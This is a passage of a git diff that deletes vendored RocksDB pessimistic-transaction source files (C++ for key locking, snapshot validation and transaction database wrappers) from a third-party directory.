-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& /* unused */) override {
-      RecordKey(column_family_id, key);
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& /* unused */) override {
-      RecordKey(column_family_id, key);
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      RecordKey(column_family_id, key);
-      return Status::OK();
-    }
-  };
-
-  // Iterating on this handler will add all keys in this batch into keys
-  Handler handler;
-  batch->Iterate(&handler);
-
-  Status s;
-
-  // Attempt to lock all keys
-  for (const auto& cf_iter : handler.keys_) {
-    uint32_t cfh_id = cf_iter.first;
-    auto& cfh_keys = cf_iter.second;
-
-    for (const auto& key_iter : cfh_keys) {
-      const std::string& key = key_iter;
-
-      s = txn_db_impl_->TryLock(this, cfh_id, key, true /* exclusive */);
-      if (!s.ok()) {
-        break;
-      }
-      TrackKey(keys_to_unlock, cfh_id, std::move(key), kMaxSequenceNumber,
-               false, true /* exclusive */);
-    }
-
-    if (!s.ok()) {
-      break;
-    }
-  }
-
-  if (!s.ok()) {
-    txn_db_impl_->UnLock(this, keys_to_unlock);
-  }
-
-  return s;
-}
-
-// Attempt to lock this key.
-// Returns OK if the key has been successfully locked.  Non-ok, otherwise.
-// If check_shapshot is true and this transaction has a snapshot set,
-// this key will only be locked if there have been no writes to this key since
-// the snapshot time.
-Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family,
-                                       const Slice& key, bool read_only,
-                                       bool exclusive, bool untracked) {
-  uint32_t cfh_id = GetColumnFamilyID(column_family);
-  std::string key_str = key.ToString();
-  bool previously_locked;
-  bool lock_upgrade = false;
-  Status s;
-
-  // lock this key if this transactions hasn't already locked it
-  SequenceNumber current_seqno = kMaxSequenceNumber;
-  SequenceNumber new_seqno = kMaxSequenceNumber;
-
-  const auto& tracked_keys = GetTrackedKeys();
-  const auto tracked_keys_cf = tracked_keys.find(cfh_id);
-  if (tracked_keys_cf == tracked_keys.end()) {
-    previously_locked = false;
-  } else {
-    auto iter = tracked_keys_cf->second.find(key_str);
-    if (iter == tracked_keys_cf->second.end()) {
-      previously_locked = false;
-    } else {
-      if (!iter->second.exclusive && exclusive) {
-        lock_upgrade = true;
-      }
-      previously_locked = true;
-      current_seqno = iter->second.seq;
-    }
-  }
-
-  // Lock this key if this transactions hasn't already locked it or we require
-  // an upgrade.
-  if (!previously_locked || lock_upgrade) {
-    s = txn_db_impl_->TryLock(this, cfh_id, key_str, exclusive);
-  }
-
-  SetSnapshotIfNeeded();
-
-  // Even though we do not care about doing conflict checking for this write,
-  // we still need to take a lock to make sure we do not cause a conflict with
-  // some other write.  However, we do not need to check if there have been
-  // any writes since this transaction's snapshot.
-  // TODO(agiardullo): could optimize by supporting shared txn locks in the
-  // future
-  if (untracked || snapshot_ == nullptr) {
-    // Need to remember the earliest sequence number that we know that this
-    // key has not been modified after.  This is useful if this same
-    // transaction
-    // later tries to lock this key again.
-    if (current_seqno == kMaxSequenceNumber) {
-      // Since we haven't checked a snapshot, we only know this key has not
-      // been modified since after we locked it.
-      new_seqno = db_->GetLatestSequenceNumber();
-    } else {
-      new_seqno = current_seqno;
-    }
-  } else {
-    // If a snapshot is set, we need to make sure the key hasn't been modified
-    // since the snapshot.  This must be done after we locked the key.
-    if (s.ok()) {
-      s = ValidateSnapshot(column_family, key, current_seqno, &new_seqno);
-
-      if (!s.ok()) {
-        // Failed to validate key
-        if (!previously_locked) {
-          // Unlock key we just locked
-          if (lock_upgrade) {
-            s = txn_db_impl_->TryLock(this, cfh_id, key_str,
-                                      false /* exclusive */);
-            assert(s.ok());
-          } else {
-            txn_db_impl_->UnLock(this, cfh_id, key.ToString());
-          }
-        }
-      }
-    }
-  }
-
-  if (s.ok()) {
-    // Let base class know we've conflict checked this key.
-    TrackKey(cfh_id, key_str, new_seqno, read_only, exclusive);
-  }
-
-  return s;
-}
-
-// Return OK() if this key has not been modified more recently than the
-// transaction snapshot_.
-Status PessimisticTransaction::ValidateSnapshot(
-    ColumnFamilyHandle* column_family, const Slice& key,
-    SequenceNumber prev_seqno, SequenceNumber* new_seqno) {
-  assert(snapshot_);
-
-  SequenceNumber seq = snapshot_->GetSequenceNumber();
-  if (prev_seqno <= seq) {
-    // If the key has been previous validated at a sequence number earlier
-    // than the curent snapshot's sequence number, we already know it has not
-    // been modified.
-    return Status::OK();
-  }
-
-  *new_seqno = seq;
-
-  ColumnFamilyHandle* cfh =
-      column_family ? column_family : db_impl_->DefaultColumnFamily();
-
-  return TransactionUtil::CheckKeyForConflicts(db_impl_, cfh, key.ToString(),
-                                               snapshot_->GetSequenceNumber(),
-                                               false /* cache_only */);
-}
-
-bool PessimisticTransaction::TryStealingLocks() {
-  assert(IsExpired());
-  TransactionState expected = STARTED;
-  return std::atomic_compare_exchange_strong(&txn_state_, &expected,
-                                             LOCKS_STOLEN);
-}
-
-void PessimisticTransaction::UnlockGetForUpdate(
-    ColumnFamilyHandle* column_family, const Slice& key) {
-  txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString());
-}
-
-Status PessimisticTransaction::SetName(const TransactionName& name) {
-  Status s;
-  if (txn_state_ == STARTED) {
-    if (name_.length()) {
-      s = Status::InvalidArgument("Transaction has already been named.");
-    } else if (txn_db_impl_->GetTransactionByName(name) != nullptr) {
-      s = Status::InvalidArgument("Transaction name must be unique.");
-    } else if (name.length() < 1 || name.length() > 512) {
-      s = Status::InvalidArgument(
-          "Transaction name length must be between 1 and 512 chars.");
-    } else {
-      name_ = name;
-      txn_db_impl_->RegisterTransaction(this);
-    }
-  } else {
-    s = Status::InvalidArgument("Transaction is beyond state for naming.");
-  }
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.h b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.h
deleted file mode 100644
index 5c6d4d2..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.h
+++ /dev/null
@@ -1,230 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <atomic>
-#include <mutex>
-#include <stack>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/autovector.h"
-#include "utilities/transactions/transaction_base.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class PessimisticTransactionDB;
-
-// A transaction under pessimistic concurrency control. This class implements
-// the locking API and interfaces with the lock manager as well as the
-// pessimistic transactional db.
-class PessimisticTransaction : public TransactionBaseImpl {
- public:
-  PessimisticTransaction(TransactionDB* db, const WriteOptions& write_options,
-                         const TransactionOptions& txn_options);
-
-  virtual ~PessimisticTransaction();
-
-  void Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options,
-                    const TransactionOptions& txn_options);
-
-  Status Prepare() override;
-
-  Status Commit() override;
-
-  virtual Status CommitBatch(WriteBatch* batch) = 0;
-
-  Status Rollback() override = 0;
-
-  Status RollbackToSavePoint() override;
-
-  Status SetName(const TransactionName& name) override;
-
-  // Generate a new unique transaction identifier
-  static TransactionID GenTxnID();
-
-  TransactionID GetID() const override { return txn_id_; }
-
-  std::vector<TransactionID> GetWaitingTxns(uint32_t* column_family_id,
-                                            std::string* key) const override {
-    std::lock_guard<std::mutex> lock(wait_mutex_);
-    std::vector<TransactionID> ids(waiting_txn_ids_.size());
-    if (key) *key = waiting_key_ ? *waiting_key_ : "";
-    if (column_family_id) *column_family_id = waiting_cf_id_;
-    std::copy(waiting_txn_ids_.begin(), waiting_txn_ids_.end(), ids.begin());
-    return ids;
-  }
-
-  void SetWaitingTxn(autovector<TransactionID> ids, uint32_t column_family_id,
-                     const std::string* key) {
-    std::lock_guard<std::mutex> lock(wait_mutex_);
-    waiting_txn_ids_ = ids;
-    waiting_cf_id_ = column_family_id;
-    waiting_key_ = key;
-  }
-
-  void ClearWaitingTxn() {
-    std::lock_guard<std::mutex> lock(wait_mutex_);
-    waiting_txn_ids_.clear();
-    waiting_cf_id_ = 0;
-    waiting_key_ = nullptr;
-  }
-
-  // Returns the time (in microseconds according to Env->GetMicros())
-  // that this transaction will be expired.  Returns 0 if this transaction does
-  // not expire.
-  uint64_t GetExpirationTime() const { return expiration_time_; }
-
-  // returns true if this transaction has an expiration_time and has expired.
-  bool IsExpired() const;
-
-  // Returns the number of microseconds a transaction can wait on acquiring a
-  // lock or -1 if there is no timeout.
-  int64_t GetLockTimeout() const { return lock_timeout_; }
-  void SetLockTimeout(int64_t timeout) override {
-    lock_timeout_ = timeout * 1000;
-  }
-
-  // Returns true if locks were stolen successfully, false otherwise.
-  bool TryStealingLocks();
-
-  bool IsDeadlockDetect() const override { return deadlock_detect_; }
-
-  int64_t GetDeadlockDetectDepth() const { return deadlock_detect_depth_; }
-
- protected:
-  virtual Status PrepareInternal() = 0;
-
-  virtual Status CommitWithoutPrepareInternal() = 0;
-
-  virtual Status CommitInternal() = 0;
-
-  void Initialize(const TransactionOptions& txn_options);
-
-  Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock);
-
-  Status TryLock(ColumnFamilyHandle* column_family, const Slice& key,
-                 bool read_only, bool exclusive,
-                 bool untracked = false) override;
-
-  void Clear() override;
-
-  PessimisticTransactionDB* txn_db_impl_;
-  DBImpl* db_impl_;
-
-  // If non-zero, this transaction should not be committed after this time (in
-  // microseconds according to Env->NowMicros())
-  uint64_t expiration_time_;
-
- private:
-  // Used to create unique ids for transactions.
-  static std::atomic<TransactionID> txn_id_counter_;
-
-  // Unique ID for this transaction
-  TransactionID txn_id_;
-
-  // IDs for the transactions that are blocking the current transaction.
-  //
-  // empty if current transaction is not waiting.
-  autovector<TransactionID> waiting_txn_ids_;
-
-  // The following two represents the (cf, key) that a transaction is waiting
-  // on.
-  //
-  // If waiting_key_ is not null, then the pointer should always point to
-  // a valid string object. The reason is that it is only non-null when the
-  // transaction is blocked in the TransactionLockMgr::AcquireWithTimeout
-  // function. At that point, the key string object is one of the function
-  // parameters.
-  uint32_t waiting_cf_id_;
-  const std::string* waiting_key_;
-
-  // Mutex protecting waiting_txn_ids_, waiting_cf_id_ and waiting_key_.
-  mutable std::mutex wait_mutex_;
-
-  // Timeout in microseconds when locking a key or -1 if there is no timeout.
-  int64_t lock_timeout_;
-
-  // Whether to perform deadlock detection or not.
-  bool deadlock_detect_;
-
-  // Whether to perform deadlock detection or not.
-  int64_t deadlock_detect_depth_;
-
-  Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key,
-                          SequenceNumber prev_seqno, SequenceNumber* new_seqno);
-
-  void UnlockGetForUpdate(ColumnFamilyHandle* column_family,
-                          const Slice& key) override;
-
-  // No copying allowed
-  PessimisticTransaction(const PessimisticTransaction&);
-  void operator=(const PessimisticTransaction&);
-};
-
-class WriteCommittedTxn : public PessimisticTransaction {
- public:
-  WriteCommittedTxn(TransactionDB* db, const WriteOptions& write_options,
-                    const TransactionOptions& txn_options);
-
-  virtual ~WriteCommittedTxn() {}
-
-  Status CommitBatch(WriteBatch* batch) override;
-
-  Status Rollback() override;
-
- private:
-  Status PrepareInternal() override;
-
-  Status CommitWithoutPrepareInternal() override;
-
-  Status CommitInternal() override;
-
-  Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key,
-                          SequenceNumber prev_seqno, SequenceNumber* new_seqno);
-
-  // No copying allowed
-  WriteCommittedTxn(const WriteCommittedTxn&);
-  void operator=(const WriteCommittedTxn&);
-};
-
-// Used at commit time to check whether transaction is committing before its
-// expiration time.
-class TransactionCallback : public WriteCallback {
- public:
-  explicit TransactionCallback(PessimisticTransaction* txn) : txn_(txn) {}
-
-  Status Callback(DB* /* unused */) override {
-    if (txn_->IsExpired()) {
-      return Status::Expired();
-    } else {
-      return Status::OK();
-    }
-  }
-
-  bool AllowWriteBatching() override { return true; }
-
- private:
-  PessimisticTransaction* txn_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.cc b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.cc
deleted file mode 100644
index 8fa9575..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.cc
+++ /dev/null
@@ -1,806 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-#include <inttypes.h>
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/cast_util.h"
-#include "util/mutexlock.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/transaction_db_mutex_impl.h"
-
-namespace rocksdb {
-
-PessimisticTransactionDB::PessimisticTransactionDB(
-    DB* db, const TransactionDBOptions& txn_db_options)
-    : TransactionDB(db),
-      db_impl_(static_cast_with_check<DBImpl, DB>(db)),
-      txn_db_options_(txn_db_options),
-      lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks,
-                txn_db_options_.max_num_deadlocks,
-                txn_db_options_.custom_mutex_factory
-                    ? txn_db_options_.custom_mutex_factory
-                    : std::shared_ptr<TransactionDBMutexFactory>(
-                          new TransactionDBMutexFactoryImpl())) {
-  assert(db_impl_ != nullptr);
-  info_log_ = db_impl_->GetDBOptions().info_log;
-}
-
-// Support initiliazing PessimisticTransactionDB from a stackable db
-//
-//    PessimisticTransactionDB
-//     ^        ^
-//     |        |
-//     |        +
-//     |   StackableDB
-//     |   ^
-//     |   |
-//     +   +
-//     DBImpl
-//       ^
-//       |(inherit)
-//       +
-//       DB
-//
-PessimisticTransactionDB::PessimisticTransactionDB(
-    StackableDB* db, const TransactionDBOptions& txn_db_options)
-    : TransactionDB(db),
-      db_impl_(static_cast_with_check<DBImpl, DB>(db->GetRootDB())),
-      txn_db_options_(txn_db_options),
-      lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks,
-                txn_db_options_.max_num_deadlocks,
-                txn_db_options_.custom_mutex_factory
-                    ? txn_db_options_.custom_mutex_factory
-                    : std::shared_ptr<TransactionDBMutexFactory>(
-                          new TransactionDBMutexFactoryImpl())) {
-  assert(db_impl_ != nullptr);
-}
-
-PessimisticTransactionDB::~PessimisticTransactionDB() {
-  while (!transactions_.empty()) {
-    delete transactions_.begin()->second;
-  }
-}
-
-Status PessimisticTransactionDB::Initialize(
-    const std::vector<size_t>& compaction_enabled_cf_indices,
-    const std::vector<ColumnFamilyHandle*>& handles) {
-  for (auto cf_ptr : handles) {
-    AddColumnFamily(cf_ptr);
-  }
-  // Re-enable compaction for the column families that initially had
-  // compaction enabled.
-  std::vector<ColumnFamilyHandle*> compaction_enabled_cf_handles;
-  compaction_enabled_cf_handles.reserve(compaction_enabled_cf_indices.size());
-  for (auto index : compaction_enabled_cf_indices) {
-    compaction_enabled_cf_handles.push_back(handles[index]);
-  }
-
-  Status s = EnableAutoCompaction(compaction_enabled_cf_handles);
-
-  // create 'real' transactions from recovered shell transactions
-  auto dbimpl = reinterpret_cast<DBImpl*>(GetRootDB());
-  assert(dbimpl != nullptr);
-  auto rtrxs = dbimpl->recovered_transactions();
-
-  for (auto it = rtrxs.begin(); it != rtrxs.end(); it++) {
-    auto recovered_trx = it->second;
-    assert(recovered_trx);
-    assert(recovered_trx->log_number_);
-    assert(recovered_trx->name_.length());
-
-    WriteOptions w_options;
-    w_options.sync = true;
-    TransactionOptions t_options;
-
-    Transaction* real_trx = BeginTransaction(w_options, t_options, nullptr);
-    assert(real_trx);
-    real_trx->SetLogNumber(recovered_trx->log_number_);
-
-    s = real_trx->SetName(recovered_trx->name_);
-    if (!s.ok()) {
-      break;
-    }
-
-    s = real_trx->RebuildFromWriteBatch(recovered_trx->batch_);
-    real_trx->SetState(Transaction::PREPARED);
-    if (!s.ok()) {
-      break;
-    }
-  }
-  if (s.ok()) {
-    dbimpl->DeleteAllRecoveredTransactions();
-  }
-  return s;
-}
-
-Transaction* WriteCommittedTxnDB::BeginTransaction(
-    const WriteOptions& write_options, const TransactionOptions& txn_options,
-    Transaction* old_txn) {
-  if (old_txn != nullptr) {
-    ReinitializeTransaction(old_txn, write_options, txn_options);
-    return old_txn;
-  } else {
-    return new WriteCommittedTxn(this, write_options, txn_options);
-  }
-}
-
-Transaction* WritePreparedTxnDB::BeginTransaction(
-    const WriteOptions& write_options, const TransactionOptions& txn_options,
-    Transaction* old_txn) {
-  if (old_txn != nullptr) {
-    ReinitializeTransaction(old_txn, write_options, txn_options);
-    return old_txn;
-  } else {
-    return new WritePreparedTxn(this, write_options, txn_options);
-  }
-}
-
-TransactionDBOptions PessimisticTransactionDB::ValidateTxnDBOptions(
-    const TransactionDBOptions& txn_db_options) {
-  TransactionDBOptions validated = txn_db_options;
-
-  if (txn_db_options.num_stripes == 0) {
-    validated.num_stripes = 1;
-  }
-
-  return validated;
-}
-
-Status TransactionDB::Open(const Options& options,
-                           const TransactionDBOptions& txn_db_options,
-                           const std::string& dbname, TransactionDB** dbptr) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = TransactionDB::Open(db_options, txn_db_options, dbname,
-                                 column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-
-  return s;
-}
-
-Status TransactionDB::Open(
-    const DBOptions& db_options, const TransactionDBOptions& txn_db_options,
-    const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, TransactionDB** dbptr) {
-  Status s;
-  DB* db;
-
-  std::vector<ColumnFamilyDescriptor> column_families_copy = column_families;
-  std::vector<size_t> compaction_enabled_cf_indices;
-  DBOptions db_options_2pc = db_options;
-  PrepareWrap(&db_options_2pc, &column_families_copy,
-              &compaction_enabled_cf_indices);
-  s = DB::Open(db_options_2pc, dbname, column_families_copy, handles, &db);
-  if (s.ok()) {
-    s = WrapDB(db, txn_db_options, compaction_enabled_cf_indices, *handles,
-               dbptr);
-  }
-  return s;
-}
-
-void TransactionDB::PrepareWrap(
-    DBOptions* db_options, std::vector<ColumnFamilyDescriptor>* column_families,
-    std::vector<size_t>* compaction_enabled_cf_indices) {
-  compaction_enabled_cf_indices->clear();
-
-  // Enable MemTable History if not already enabled
-  for (size_t i = 0; i < column_families->size(); i++) {
-    ColumnFamilyOptions* cf_options = &(*column_families)[i].options;
-
-    if (cf_options->max_write_buffer_number_to_maintain == 0) {
-      // Setting to -1 will set the History size to max_write_buffer_number.
-      cf_options->max_write_buffer_number_to_maintain = -1;
-    }
-    if (!cf_options->disable_auto_compactions) {
-      // Disable compactions momentarily to prevent race with DB::Open
-      cf_options->disable_auto_compactions = true;
-      compaction_enabled_cf_indices->push_back(i);
-    }
-  }
-  db_options->allow_2pc = true;
-}
-
-Status TransactionDB::WrapDB(
-    // make sure this db is already opened with memtable history enabled,
-    // auto compaction distabled and 2 phase commit enabled
-    DB* db, const TransactionDBOptions& txn_db_options,
-    const std::vector<size_t>& compaction_enabled_cf_indices,
-    const std::vector<ColumnFamilyHandle*>& handles, TransactionDB** dbptr) {
-  PessimisticTransactionDB* txn_db;
-  switch (txn_db_options.write_policy) {
-    case WRITE_UNPREPARED:
-      return Status::NotSupported("WRITE_UNPREPARED is not implemented yet");
-    case WRITE_PREPARED:
-      txn_db = new WritePreparedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-      break;
-    case WRITE_COMMITTED:
-    default:
-      txn_db = new WriteCommittedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-  }
-  *dbptr = txn_db;
-  Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles);
-  return s;
-}
-
-Status TransactionDB::WrapStackableDB(
-    // make sure this stackable_db is already opened with memtable history
-    // enabled,
-    // auto compaction distabled and 2 phase commit enabled
-    StackableDB* db, const TransactionDBOptions& txn_db_options,
-    const std::vector<size_t>& compaction_enabled_cf_indices,
-    const std::vector<ColumnFamilyHandle*>& handles, TransactionDB** dbptr) {
-  PessimisticTransactionDB* txn_db;
-  switch (txn_db_options.write_policy) {
-    case WRITE_UNPREPARED:
-      return Status::NotSupported("WRITE_UNPREPARED is not implemented yet");
-    case WRITE_PREPARED:
-      txn_db = new WritePreparedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-      break;
-    case WRITE_COMMITTED:
-    default:
-      txn_db = new WriteCommittedTxnDB(
-          db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options));
-  }
-  *dbptr = txn_db;
-  Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles);
-  return s;
-}
-
-// Let TransactionLockMgr know that this column family exists so it can
-// allocate a LockMap for it.
-void PessimisticTransactionDB::AddColumnFamily(
-    const ColumnFamilyHandle* handle) {
-  lock_mgr_.AddColumnFamily(handle->GetID());
-}
-
-Status PessimisticTransactionDB::CreateColumnFamily(
-    const ColumnFamilyOptions& options, const std::string& column_family_name,
-    ColumnFamilyHandle** handle) {
-  InstrumentedMutexLock l(&column_family_mutex_);
-
-  Status s = db_->CreateColumnFamily(options, column_family_name, handle);
-  if (s.ok()) {
-    lock_mgr_.AddColumnFamily((*handle)->GetID());
-  }
-
-  return s;
-}
-
-// Let TransactionLockMgr know that it can deallocate the LockMap for this
-// column family.
-Status PessimisticTransactionDB::DropColumnFamily(
-    ColumnFamilyHandle* column_family) {
-  InstrumentedMutexLock l(&column_family_mutex_);
-
-  Status s = db_->DropColumnFamily(column_family);
-  if (s.ok()) {
-    lock_mgr_.RemoveColumnFamily(column_family->GetID());
-  }
-
-  return s;
-}
-
-Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn,
-                                         uint32_t cfh_id,
-                                         const std::string& key,
-                                         bool exclusive) {
-  return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive);
-}
-
-void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn,
-                                      const TransactionKeyMap* keys) {
-  lock_mgr_.UnLock(txn, keys, GetEnv());
-}
-
-void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn,
-                                      uint32_t cfh_id, const std::string& key) {
-  lock_mgr_.UnLock(txn, cfh_id, key, GetEnv());
-}
-
-// Used when wrapping DB write operations in a transaction
-Transaction* PessimisticTransactionDB::BeginInternalTransaction(
-    const WriteOptions& options) {
-  TransactionOptions txn_options;
-  Transaction* txn = BeginTransaction(options, txn_options, nullptr);
-
-  // Use default timeout for non-transactional writes
-  txn->SetLockTimeout(txn_db_options_.default_lock_timeout);
-  return txn;
-}
-
-// All user Put, Merge, Delete, and Write requests must be intercepted to make
-// sure that they lock all keys that they are writing to avoid causing conflicts
-// with any concurrent transactions. The easiest way to do this is to wrap all
-// write operations in a transaction.
-//
-// Put(), Merge(), and Delete() only lock a single key per call.  Write() will
-// sort its keys before locking them.  This guarantees that TransactionDB write
-// methods cannot deadlock with eachother (but still could deadlock with a
-// Transaction).
-Status PessimisticTransactionDB::Put(const WriteOptions& options,
-                                     ColumnFamilyHandle* column_family,
-                                     const Slice& key, const Slice& val) {
-  Status s;
-
-  Transaction* txn = BeginInternalTransaction(options);
-  txn->DisableIndexing();
-
-  // Since the client didn't create a transaction, they don't care about
-  // conflict checking for this write.  So we just need to do PutUntracked().
-  s = txn->PutUntracked(column_family, key, val);
-
-  if (s.ok()) {
-    s = txn->Commit();
-  }
-
-  delete txn;
-
-  return s;
-}
-
-Status PessimisticTransactionDB::Delete(const WriteOptions& wopts,
-                                        ColumnFamilyHandle* column_family,
-                                        const Slice& key) {
-  Status s;
-
-  Transaction* txn = BeginInternalTransaction(wopts);
-  txn->DisableIndexing();
-
-  // Since the client didn't create a transaction, they don't care about
-  // conflict checking for this write.  So we just need to do
-  // DeleteUntracked().
-  s = txn->DeleteUntracked(column_family, key);
-
-  if (s.ok()) {
-    s = txn->Commit();
-  }
-
-  delete txn;
-
-  return s;
-}
-
-Status PessimisticTransactionDB::Merge(const WriteOptions& options,
-                                       ColumnFamilyHandle* column_family,
-                                       const Slice& key, const Slice& value) {
-  Status s;
-
-  Transaction* txn = BeginInternalTransaction(options);
-  txn->DisableIndexing();
-
-  // Since the client didn't create a transaction, they don't care about
-  // conflict checking for this write.  So we just need to do
-  // MergeUntracked().
-  s = txn->MergeUntracked(column_family, key, value);
-
-  if (s.ok()) {
-    s = txn->Commit();
-  }
-
-  delete txn;
-
-  return s;
-}
-
-Status PessimisticTransactionDB::Write(const WriteOptions& opts,
-                                       WriteBatch* updates) {
-  // Need to lock all keys in this batch to prevent write conflicts with
-  // concurrent transactions.
-  Transaction* txn = BeginInternalTransaction(opts);
-  txn->DisableIndexing();
-
-  auto txn_impl =
-      static_cast_with_check<PessimisticTransaction, Transaction>(txn);
-
-  // Since commitBatch sorts the keys before locking, concurrent Write()
-  // operations will not cause a deadlock.
-  // In order to avoid a deadlock with a concurrent Transaction, Transactions
-  // should use a lock timeout.
-  Status s = txn_impl->CommitBatch(updates);
-
-  delete txn;
-
-  return s;
-}
-
-void PessimisticTransactionDB::InsertExpirableTransaction(
-    TransactionID tx_id, PessimisticTransaction* tx) {
-  assert(tx->GetExpirationTime() > 0);
-  std::lock_guard<std::mutex> lock(map_mutex_);
-  expirable_transactions_map_.insert({tx_id, tx});
-}
-
-void PessimisticTransactionDB::RemoveExpirableTransaction(TransactionID tx_id) {
-  std::lock_guard<std::mutex> lock(map_mutex_);
-  expirable_transactions_map_.erase(tx_id);
-}
-
-bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks(
-    TransactionID tx_id) {
-  std::lock_guard<std::mutex> lock(map_mutex_);
-
-  auto tx_it = expirable_transactions_map_.find(tx_id);
-  if (tx_it == expirable_transactions_map_.end()) {
-    return true;
-  }
-  PessimisticTransaction& tx = *(tx_it->second);
-  return tx.TryStealingLocks();
-}
-
-void PessimisticTransactionDB::ReinitializeTransaction(
-    Transaction* txn, const WriteOptions& write_options,
-    const TransactionOptions& txn_options) {
-  auto txn_impl =
-      static_cast_with_check<PessimisticTransaction, Transaction>(txn);
-
-  txn_impl->Reinitialize(this, write_options, txn_options);
-}
-
-Transaction* PessimisticTransactionDB::GetTransactionByName(
-    const TransactionName& name) {
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  auto it = transactions_.find(name);
-  if (it == transactions_.end()) {
-    return nullptr;
-  } else {
-    return it->second;
-  }
-}
-
-void PessimisticTransactionDB::GetAllPreparedTransactions(
-    std::vector<Transaction*>* transv) {
-  assert(transv);
-  transv->clear();
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  for (auto it = transactions_.begin(); it != transactions_.end(); it++) {
-    if (it->second->GetState() == Transaction::PREPARED) {
-      transv->push_back(it->second);
-    }
-  }
-}
-
-TransactionLockMgr::LockStatusData
-PessimisticTransactionDB::GetLockStatusData() {
-  return lock_mgr_.GetLockStatusData();
-}
-
-std::vector<DeadlockPath> PessimisticTransactionDB::GetDeadlockInfoBuffer() {
-  return lock_mgr_.GetDeadlockInfoBuffer();
-}
-
-void PessimisticTransactionDB::SetDeadlockInfoBufferSize(uint32_t target_size) {
-  lock_mgr_.Resize(target_size);
-}
-
-void PessimisticTransactionDB::RegisterTransaction(Transaction* txn) {
-  assert(txn);
-  assert(txn->GetName().length() > 0);
-  assert(GetTransactionByName(txn->GetName()) == nullptr);
-  assert(txn->GetState() == Transaction::STARTED);
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  transactions_[txn->GetName()] = txn;
-}
-
-void PessimisticTransactionDB::UnregisterTransaction(Transaction* txn) {
-  assert(txn);
-  std::lock_guard<std::mutex> lock(name_map_mutex_);
-  auto it = transactions_.find(txn->GetName());
-  assert(it != transactions_.end());
-  transactions_.erase(it);
-}
-
-// Returns true if commit_seq <= snapshot_seq
-bool WritePreparedTxnDB::IsInSnapshot(uint64_t prep_seq,
-                                      uint64_t snapshot_seq) {
-  // Here we try to infer the return value without looking into prepare list.
-  // This would help avoiding synchronization over a shared map.
-  // TODO(myabandeh): read your own writes
-  // TODO(myabandeh): optimize this. This sequence of checks must be correct but
-  // not necessary efficient
-  if (snapshot_seq < prep_seq) {
-    // snapshot_seq < prep_seq <= commit_seq => snapshot_seq < commit_seq
-    return false;
-  }
-  if (!delayed_prepared_empty_.load(std::memory_order_acquire)) {
-    // We should not normally reach here
-    ReadLock rl(&prepared_mutex_);
